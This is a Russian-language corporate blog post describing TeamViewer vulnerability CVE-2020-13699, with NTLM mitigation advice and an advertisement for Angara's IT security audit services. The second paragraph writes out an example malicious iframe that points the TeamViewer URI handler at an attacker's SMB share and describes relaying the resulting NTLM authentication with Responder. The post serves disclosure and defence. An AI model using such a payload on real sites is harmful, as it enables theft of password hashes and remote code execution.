Обнаружена серьезная уязвимость в TeamViewer

Обнаружена серьезная уязвимость в TeamViewer
ed16d9d87cce838af729c1dd7b8b0f4b.jpg

Производитель популярного ПО удаленного управления и показа TeamViewer предупредил об опасной уязвимости.
Злоумышленник может встроить вредоносный iframe на веб-сайт с созданным URL (<ifr ame src = 'teamviewer10: --play IP-атакующего share fake.tvs'>), что запустит настольный клиент TeamViewer Windows и заставит его открыть удаленный доступ к ресурсу по SMB (SMB share). Windows выполнит проверку подлинности NTLM при открытии шары SMB, и этот запрос может быть ретранслирован (с помощью инструмента responder) для выполнения кода (или использован для захвата и взлома хэша). Таким образом, преступник может использовать URI схему TeamViewer для утечки имени систем, хэша пароля и других данных.
Этой проблеме подвержены обработчики URI: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 и tvvpn1. Проблема может быть исправлена путем цитирования параметров, переданных вышеупомянутым URI обработчиком, например URL:  teamviewer10 Протокол "C: Program Files (x86) TeamViewer TeamViewer.exe" "% 1"
Уязвимость получила идентификатор CVE 2020-13699 и устраняется обновлением ПО TeamViewer.
К слову, уязвимости NTLM, позволяющие использовать его для подобной утечки данных – это  CVE-2019-1040 и CVE-2019-1019. Для них доступны программные коррекции (patch) и следующие рекомендации:
• применять подписывание SMB (SMB signing) на всех машинах сети,
• блокировать NTLMv1,
• применять подписывание LDAP/S (LDAP/S Signing),
• обязательно использовать расширенную защиту аутентификации (Enhanced Protection for Authentication – EPA) при запросах,
• отдавать предпочтение другим схемам аутентификации (Kerberos и др.).
Обновление системного и прикладного ПО требует обязательного и своевременного выполнения. Кроме того, важно регулярно производить аудит ПО на корректность настройки с точки зрения ИБ и использовать рекомендованные параметры. Для этого необходим экспертный уровень знаний как принципов работы ИТ-инфраструктуры, так и ИБ-рекомендаций. Это разные направления ИТ-деятельности и сочетание таких знаний достаточно редко.
Компания Angara Professional Assistance (входит в группу компаний Angara) предлагает экспертную сервисную услугу технического аудита, которая включает проверку эффективности ИТ-систем, степени их защищенности как в части технических средств, так и в части понимания пользователями норм информационной безопасности. Услуга представляет два основных направления аудита:
Health Check. Предусматривает обследование и оценку «состояния здоровья» системы, оптимальности архитектуры, достаточности системных ресурсов, уровня отказоустойчивости и готовности к восстановлению в случае критических сбоев. Оценка проводится на основе рекомендаций производителя и опыта инженеров эксплуатации и сопровождения.
Security Health Check. Предусматривает обследование и оценку «уровня самозащиты» системы, выполнения таких базовых процессов обеспечения безопасности, как управление доступом к системе, журналирование и мониторинг событий, а также оценку обеспечения отказоустойчивости и готовности к восстановлению в случае критических сбоев.
Подробнее об услуге и тарифах можно узнать у менеджеров Angara Professional Assistance по e-mail info@angarapro.ru или телефону 8 (495) 269-26-06.
Кроме того, на сайте есть небольшой опросный лист самопроверки, результатом которого будет краткая оценка уровня самозащиты, отказоустойчивости, качества сопровождения и общее состояние здоровья информационных систем.
Alt text

Большой брат следит за вами, но мы знаем, как остановить его. Подпишитесь на наш канал!


Angara Technologies Group

Корпоративный блог компании Angara Technologies Group